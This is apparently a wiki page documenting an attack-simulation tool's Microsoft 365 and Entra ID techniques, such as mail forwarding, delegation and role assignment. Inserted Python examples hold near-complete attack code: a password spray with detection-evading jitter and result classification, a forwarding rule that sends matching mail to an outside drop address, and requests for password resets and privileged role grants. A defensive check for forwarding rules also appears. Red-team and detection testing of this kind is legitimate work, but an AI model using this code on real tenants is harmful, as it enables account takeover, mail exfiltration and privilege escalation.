
Supported Techniques

mvelazco edited this page Dec 17, 2024 · 22 revisions

read_email

  • Supported Methods: Graph, EWS
  • Description: Simulates the action of reading emails from a specified mailbox, demonstrating data access and potential exfiltration capabilities.
  • Execution Context: Operates within the access scope of the authenticated user's mailbox with user credentials; with application credentials and the necessary permissions, it extends to reading emails from any mailbox in the organization.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: Specifies the API method used (Graph API or EWS).
    • mailbox: Target email address from which emails will be read.
    • limit: Maximum number of emails to be read.

search_mailbox

  • Supported Methods: Graph
  • Description: Simulates an adversary conducting targeted searches within a mailbox to uncover sensitive information.
  • Execution Context: This technique operates exclusively within the scope of the authenticated user's mailbox based on provided user credentials. It does not support application authentication.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: Specifies the API method used (Graph API).
    • keyword: Keyword for the search.
    • mailbox: Target mailbox to search; with user credentials this is the authenticated user's own mailbox.
    • limit: Optional parameter to limit the number of search results returned.

search_onedrive

  • Supported Methods: Graph
  • Description: Simulates an adversary conducting targeted searches within OneDrive and SharePoint content to locate sensitive files.
  • Execution Context: This technique operates exclusively within the scope of the authenticated user's OneDrive (and the SharePoint content that user can reach) based on provided user credentials. It does not support application authentication.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: Specifies the API method used (Graph API).
    • keyword: Keyword for the search.
    • limit: Optional parameter to limit the number of search results returned.

create_rule

  • Supported Methods: Graph, EWS, REST
  • Description: Creates an email rule to automatically forward emails containing specified keywords, simulating discreet information exfiltration.
  • Execution Context: With user credentials, allows for creating email rules within the user's own mailbox; when using application credentials with adequate permissions, rules can be established across any user mailboxes organization-wide.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: Method used for rule creation (Graph, EWS, or REST).
    • mailbox: Email address on which the rule will be created.
    • rule_name: Name of the created rule.
    • forward_to: Email address to which matching emails will be forwarded.
    • body_contains: Keyword that triggers the rule.
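
How create_rule looks on the wire with the Graph access method, together with the review check a defender runs over the same objects, as an added example in Python (not the project's code). The messageRule body follows the Graph v1.0 schema; the sample rule listing, the domain list and the one-character rule name "." (a naming pattern commonly used to keep a malicious rule inconspicuous) are constructed for the example.

```python
GRAPH = "https://graph.microsoft.com/v1.0"
FORWARDING_ACTIONS = ("forwardTo", "forwardAsAttachmentTo", "redirectTo")


def create_rule_request(rule_name, forward_to, body_contains, mailbox=None):
    """create_rule over Graph: POST a messageRule on the Inbox. /me under user credentials;
    /users/{upn-or-id} when the session may address other mailboxes."""
    base = f"{GRAPH}/me" if mailbox is None else f"{GRAPH}/users/{mailbox}"
    body = {
        "displayName": rule_name,
        "sequence": 1,
        "isEnabled": True,
        "conditions": {"bodyContains": [body_contains]},
        "actions": {"forwardTo": [{"emailAddress": {"address": forward_to}}]},
    }
    return "POST", f"{base}/mailFolders/inbox/messageRules", body


def external_forwarding_rules(rules, internal_domains):
    """Review check: rules whose forward/redirect targets leave the listed domains.
    `rules` is the `value` array of GET .../mailFolders/inbox/messageRules."""
    internal = {d.lower() for d in internal_domains}
    findings = []
    for rule in rules:
        actions = rule.get("actions") or {}
        targets = [r["emailAddress"]["address"]
                   for key in FORWARDING_ACTIONS for r in actions.get(key, [])]
        external = sorted(a for a in targets if a.rsplit("@", 1)[-1].lower() not in internal)
        if external:
            findings.append({"rule": rule.get("displayName"), "enabled": rule.get("isEnabled"),
                             "targets": external, "conditions": rule.get("conditions") or {}})
    return findings


# Constructed sample in the shape of a messageRules listing (not captured from a tenant).
SAMPLE_RULES = [
    {"displayName": "Newsletters", "isEnabled": True,
     "conditions": {"senderContains": ["news"]}, "actions": {"moveToFolder": "AAMkFolderId"}},
    {"displayName": ".", "isEnabled": True,
     "conditions": {"bodyContains": ["invoice"]},
     "actions": {"forwardTo": [{"emailAddress": {"address": "archive@example.net"}}]}},
    {"displayName": "To assistant", "isEnabled": True,
     "conditions": {"subjectContains": ["travel"]},
     "actions": {"redirectTo": [{"emailAddress": {"address": "pat@contoso.com"}}]}},
]

if __name__ == "__main__":
    method, url, body = create_rule_request("Sync", "drop@example.net", "invoice",
                                            mailbox="alice@contoso.com")
    print(method, url)
    print(body)
    # The rule the technique creates is exactly what the review check flags.
    print(external_forwarding_rules(SAMPLE_RULES + [body], ["contoso.com"]))
```

The check covers all three Graph forwarding actions (forwardTo, forwardAsAttachmentTo, redirectTo) rather than only the one the technique sets, since a rule that redirects silently is at least as useful to an adversary as one that forwards.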

enable_email_forwarding

  • Supported Methods: REST
  • Description: Enables automatic forwarding of all emails from a specified mailbox, simulating unauthorized email traffic diversion.
  • Execution Context: Can enable forwarding for the authenticated user's own mailbox with user credentials; with application credentials granted the right permissions, forwarding can be activated for any mailbox.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: This technique uses REST.
    • mailbox: Mailbox from which emails will be forwarded.
    • forward_to: Destination email address for forwarded emails.

add_folder_permission

  • Supported Methods: REST, EWS
  • Description: Grants a user access rights to a specific folder (for example, the Inbox) in a mailbox, simulating the quiet, persistent read access an adversary sets up to another user's mail.
  • Execution Context: With user credentials, folder permissions can only be granted on the authenticated user's own mailbox; application credentials with the proper permissions can modify folder permissions on any mailbox organization-wide.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: Specifies REST or EWS.
    • mailbox: Mailbox containing the folder to which permissions will be added.
    • folder: Folder for which permissions are granted.
    • grantee: User being granted folder access.
    • access_rights: Level of access granted (e.g., Owner, Author).

add_mailbox_delegation

  • Supported Methods: REST
  • Description: Grants a user FullAccess to another user's mailbox, simulating the persistence an adversary establishes after compromising an account.
  • Execution Context: Allows mailbox delegation for the authenticated user's mailbox with user credentials; application credentials with sufficient permissions enable delegation setup for any mailbox in the organization.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: Uses REST.
    • mailbox: Mailbox to which access will be delegated.
    • grantee: User granted access to the mailbox.
    • access_rights: Type of access granted, "FullAccess".

run_compliance_search

  • Supported Methods: REST
  • Description: Executes a compliance search for specified keywords, simulating the search for sensitive or regulated information.
  • Execution Context: Requires privileges from either an application with the appropriate permissions or a high-privileged user account with administrative Exchange roles.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: Uses REST.
    • keyword: Keyword for the search.
    • name: Name of the compliance search.

create_mailflow_rule

  • Supported Methods: REST
  • Description: Establishes a mail flow rule to forward emails based on defined criteria, simulating potential malicious redirection.
  • Execution Context: Requires elevated privileges: either an application granted the necessary permissions or a user holding administrative Exchange roles.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: Uses REST.
    • forward_to: Email address for forwarding.
    • name: Name of the mail flow rule.

password_spray

  • Description: Performs a password spray attack by attempting to authenticate multiple user accounts with a single password, simulating a common brute-force technique to identify weak or reused passwords.
  • Execution Context: Does not require an authenticated session. A successful guess yields a usable session only for accounts without Multi-Factor Authentication (MFA); for MFA-enabled accounts the attempt confirms the password but cannot complete sign-in.
  • Parameters:
    • user_list: A list of usernames or user email addresses to target.
    • password: The password to attempt across all provided users.
    • sleep: (Optional) Time in seconds to wait between attempts to avoid detection or throttling.
    • jitter: (Optional) Adds random variation to the sleep interval to evade pattern-based detection.
    • user_agent: (Optional) Custom User-Agent string for the HTTP request.
    • proxy: (Optional) HTTP/S proxy to route the requests.
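
The request and response handling behind password_spray, as an added example in Python (not the project's code). It uses the OAuth2 resource owner password credentials (ROPC) grant against the v2.0 token endpoint, classifies the AADSTS code in each reply, and applies sleep and jitter between attempts. The client_id, the reading of jitter as a fraction of sleep, the injected submit function and the sample replies are assumptions of this example. Note the classification detail the page's MFA caveat rests on: an MFA-protected account still confirms a correct password (AADSTS50076) even though no token is issued.

```python
import random
import time
from urllib.parse import urlencode

TOKEN_URL = "https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token"

# AADSTS codes the token endpoint returns for a failed ROPC grant, mapped to
# (outcome, password_confirmed). Several confirm the password without issuing a token.
OUTCOMES = {
    "AADSTS50126": ("invalid_credentials", False),
    "AADSTS50034": ("user_not_found", False),
    "AADSTS50076": ("valid_mfa_required", True),
    "AADSTS50079": ("valid_mfa_enrollment_required", True),
    "AADSTS50055": ("valid_password_expired", True),
    "AADSTS50057": ("account_disabled", False),
    "AADSTS50053": ("locked_out", False),
}


def ropc_request(tenant, client_id, username, password,
                 scope="https://graph.microsoft.com/.default", user_agent=None):
    """URL, headers and form body of one guess. client_id must be a public client the
    tenant accepts for ROPC; it is an input of this example, not a baked-in value."""
    form = urlencode({"client_id": client_id, "grant_type": "password", "username": username,
                      "password": password, "scope": scope})
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    if user_agent:
        headers["User-Agent"] = user_agent
    return TOKEN_URL.format(tenant=tenant), headers, form


def classify(status, body):
    """Map a token-endpoint reply to (outcome, password_confirmed)."""
    if status == 200 and "access_token" in body:
        return "valid_token_issued", True
    code = body.get("error_description", "").split(":", 1)[0].strip()
    return OUTCOMES.get(code, (f"unclassified:{code or status}", False))


def next_delay(sleep, jitter, rng=random):
    """Seconds to wait: sleep varied by up to +/- jitter (a fraction of sleep, assumed here)."""
    if sleep <= 0:
        return 0.0
    return max(0.0, sleep * (1 + rng.uniform(-jitter, jitter)))


def spray(users, password, submit, sleep=30, jitter=0.2, rng=random, wait=time.sleep):
    """One password across all users. submit(username, password) performs the HTTP POST and
    returns (status, json_body); it is injected so the logic can run offline. Stops at the first
    lockout, since that means the tenant's smart-lockout threshold is being tripped."""
    results = {}
    for i, user in enumerate(users):
        if i:
            wait(next_delay(sleep, jitter, rng))
        outcome, _confirmed = classify(*submit(user, password))
        results[user] = outcome
        if outcome == "locked_out":
            break
    return results


# Constructed replies in the shape of the token endpoint (not captured from a tenant).
SAMPLE_REPLIES = {
    "alice@contoso.com": (400, {"error": "invalid_grant", "error_description":
        "AADSTS50126: Error validating credentials due to invalid username or password."}),
    "bob@contoso.com": (400, {"error": "interaction_required", "error_description":
        "AADSTS50076: Due to a configuration change made by your administrator, "
        "you must use multi-factor authentication to access the resource."}),
    "carol@contoso.com": (200, {"token_type": "Bearer", "access_token": "constructed-token"}),
}


def offline_submit(username, password):
    """Stand-in for the network call; unknown users get the 'does not exist' reply."""
    return SAMPLE_REPLIES.get(username, (400, {"error": "invalid_grant",
        "error_description": "AADSTS50034: The user account does not exist in the directory."}))


if __name__ == "__main__":
    users = ["alice@contoso.com", "bob@contoso.com", "carol@contoso.com", "dan@contoso.com"]
    print(spray(users, "Winter2024!", offline_submit, sleep=0, jitter=0, wait=lambda s: None))
```

A real submit function would POST the form to the returned URL (through the proxy parameter when set) and hand back the status and parsed JSON; everything else, including the user_agent header and the pacing, is already in place above.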

change_user_password

  • Supported Methods: Microsoft Graph API
  • Description: Updates the password of a specified user account, simulating scenarios where an attacker resets or changes a user's password.
  • Execution Context: Requires an authenticated session with sufficient privileges, such as a user with administrative roles or permissions to modify user accounts.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • user_id: The unique identifier (ID) or username (UPN) of the target user account.
    • new_password: The new password to set for the target user account.

assign_app_role

  • Supported Methods: Microsoft Graph API
  • Description: Assigns application roles to a specified service principal, simulating scenarios where an attacker grants elevated permissions to applications or service principals.
  • Execution Context: Requires an authenticated session with sufficient privileges to assign roles to service principals.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • service_principal_id: The unique identifier (ID) of the target service principal to which the role will be assigned.
    • resource_id: The unique identifier (ID) of the resource (application) containing the app role.
    • app_role_id: The unique identifier (ID) of the app role to assign. Can be a single value or a list of IDs.

assign_entra_role

  • Supported Methods: Microsoft Graph API
  • Description: Assigns a Microsoft Entra ID (formerly Azure AD) directory role to a specified user or service principal, simulating privilege escalation scenarios where elevated permissions are granted.
  • Execution Context: Requires an authenticated session with sufficient privileges, such as Privileged Role Administrator or Global Administrator roles.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • user_principal_name: The User Principal Name (UPN) of the target user. Optional if principal_id is provided.
    • principal_id: The unique identifier (ID) of the user or service principal to assign the role to. Optional if user_principal_name is provided.
    • role_id: The unique identifier (ID) of the directory role to be assigned.
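
The Graph calls for change_user_password, assign_app_role and assign_entra_role, as an added example in Python (not the project's code). It includes the UPN-to-object-id lookup the last technique needs when only user_principal_name is given, the expansion of a list of app_role_id values into one assignment each, and a GUID check that fails before the call when a UPN is passed where Graph wants an object id. The injected lookup callable and the placeholder ids in the usage block are assumptions.

```python
import re

GRAPH = "https://graph.microsoft.com/v1.0"
DEFAULT_APP_ROLE = "00000000-0000-0000-0000-000000000000"  # Graph's "default access" app role
_GUID = re.compile(r"^[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}$")


def is_object_id(value):
    """True for a GUID; Graph rejects a UPN where an object id is required."""
    return bool(_GUID.match(str(value)))


def _guid(value, name):
    if not is_object_id(value):
        raise ValueError(f"{name} must be an object id (GUID), got {value!r}")
    return value


def change_user_password_request(user_id, new_password, force_change=False):
    """change_user_password: PATCH passwordProfile; user_id may be the object id or the UPN."""
    body = {"passwordProfile": {"password": new_password,
                                "forceChangePasswordNextSignIn": force_change}}
    return "PATCH", f"{GRAPH}/users/{user_id}", body


def assign_app_role_requests(service_principal_id, resource_id, app_role_id):
    """assign_app_role: one POST per role id; the all-zero appRoleId grants the default role."""
    role_ids = [app_role_id] if isinstance(app_role_id, str) else list(app_role_id)
    sp = _guid(service_principal_id, "service_principal_id")
    res = _guid(resource_id, "resource_id")
    return [("POST", f"{GRAPH}/servicePrincipals/{sp}/appRoleAssignments",
             {"principalId": sp, "resourceId": res, "appRoleId": _guid(role, "app_role_id")})
            for role in role_ids]


def resolve_principal_request(user_principal_name):
    """GET that turns a UPN into the object id assign_entra_role needs."""
    return "GET", f"{GRAPH}/users/{user_principal_name}?$select=id", None


def assign_entra_role_request(role_id, principal_id=None, user_principal_name=None, lookup=None):
    """assign_entra_role: unifiedRoleAssignment over the whole directory (scope '/').
    lookup(upn) performs resolve_principal_request and returns the id; it is injected so the
    logic runs offline."""
    if principal_id is None:
        if user_principal_name is None or lookup is None:
            raise ValueError("give principal_id, or user_principal_name plus a lookup callable")
        principal_id = lookup(user_principal_name)
    body = {"@odata.type": "#microsoft.graph.unifiedRoleAssignment",
            "principalId": _guid(principal_id, "principal_id"),
            "roleDefinitionId": _guid(role_id, "role_id"),
            "directoryScopeId": "/"}
    return "POST", f"{GRAPH}/roleManagement/directory/roleAssignments", body


if __name__ == "__main__":
    # Constructed placeholder ids; none of these exist in any tenant.
    sp, res, role = ("8b2f1c5e-0c1a-4e11-9a3b-1f0e7d6c5b4a",
                     "2c3d4e5f-6a7b-4c8d-9e0f-1a2b3c4d5e6f",
                     "a1b2c3d4-e5f6-4a7b-8c9d-0e1f2a3b4c5d")
    print(change_user_password_request("victim@contoso.com", "N3wP@ssw0rd!"))
    for req in assign_app_role_requests(sp, res, [role, DEFAULT_APP_ROLE]):
        print(req)
    print(assign_entra_role_request(role, user_principal_name="victim@contoso.com",
                                    lookup=lambda upn: sp))
```

For built-in roles the roleDefinitionId is the role's template id, so the same role_id works across tenants; app role ids, by contrast, are specific to the resource application, which is why assign_app_role needs resource_id alongside app_role_id.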